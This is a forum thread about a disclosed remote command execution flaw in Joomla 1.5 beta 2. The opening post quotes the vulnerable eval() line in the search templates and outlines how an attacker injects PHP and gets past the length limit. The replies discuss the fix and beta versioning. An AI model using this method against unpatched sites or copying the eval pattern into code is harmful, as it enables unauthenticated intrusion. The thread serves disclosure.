dangerous vulnirabilty in joomla 1.5beta2

[stiwa10]

hello
an dangerous vulnirability has been detected on joomla 1.5beta2 (Remote command execution)

Vulnerability overview:
-----------------------

The search component of Joomla! allows an attacker to execute arbitrary
PHP commands. It is e.g. possible to execute OS commands via system()
calls. PHP is set to the settings recommended by the Joomla! installer!


An attacker does not need to be authenticated to perform this attack!
Vulnerability description:
--------------------------

The following scripts of a default Joomla! 1.5 beta 2 installation
contain the vulnerable code:

1) components/com_search/views/search/tmpl/default_results.php

line 12: result .'";'); ?>

2) templates/beez/html/com_search/search/default_results.php

line 25: echo '' . eval ('echo "' . $this->result . '";');


Input of the "searchword" parameter is being passed to the mentioned
eval() code and executed. An attacker is able to append new PHP commands
after the "echo" language construct which can be used for OS command
execution.

In order to bypass the search word length limitation of 20 characters a
new GET parameter is being used to specify the OS commands (see proof of
concept).

you can read more here  http://www.milw0rm.com/exploits/4212

[Hackwar]

Joomla! 1.5 Beta2 was not meant for productive use, since exactly those security checks were not made. 2 weeks ago, this vulnerability was fixed in the trunk.

[user deleted]

Moderator note: moving from Development 1.5 to New J1.5 Forum Section

[AmyStephen]

In case someone hasn't heard the good news, we are now at Joomla! v 1.5 RC 1 where this problem does *not* exist.

[hannul]

In todays world, beta so often means usable, that if one wants to avoid using its products better name it alpha.

[willebil]

Hannul, we have been very explicit on not using the beta's on production sites.

Alpha = API is subject to change, functionality is not fully ready
Beta = API is not subject to change (at least we will try), but code is not prouction readyy
RC = code is considered production ready, last status before we go life
Stable = code is fully ready, release goes into maintenance mode (only maintanance releases will be done, and we move on to the next major/minor versions)

See also the development strategy for an in depth explaination --> http://dev.joomla.org/Joomla!%20Develop ... .v.1.0.pdf

[hannul]

I did not mean, that the fault is joomlas, but the fact is that there are products named beta (like googles many services) and codes with version numbers less that 1.0 (many Pear modules) that are fully usable. So it don't help anymore what J says, people don't read but act as they have used to. Assumption is that Beta = usable.

I don't think that joomla could have done it (versioning, warnings) any differently, but it is useless to assume that just saying that beta is not for production use is good enough.

There is another thing also, beta was launched to be tested, so it is safe to assume that while there are no "pruduction sites" out there, but test sites are and that those have been still indexed by google. Or is there something in beta distribution that prevents this?

To me it bytheway seemded, that security flaw was only usable, it beez was selected template, and rhuk_milyway is the default, so probably most of the test installations avoid this security flaw.

[Chris]

There is another thing also, beta was launched to be tested, so it is safe to assume that while there are no "pruduction sites" out there, but test sites are and that those have been still indexed by google. Or is there something in beta distribution that prevents this?

If one wants to stop indexing and/or any one other than the owner of the site using it, there is .htaccess, robots.txt and other tricks to stop that I would think.
And I suppose that is what one should do with test sites anyway.

[nathandiehl]

i am going to move this to the Beta2 board, as this vulnerabilty was in beta2, not in RC.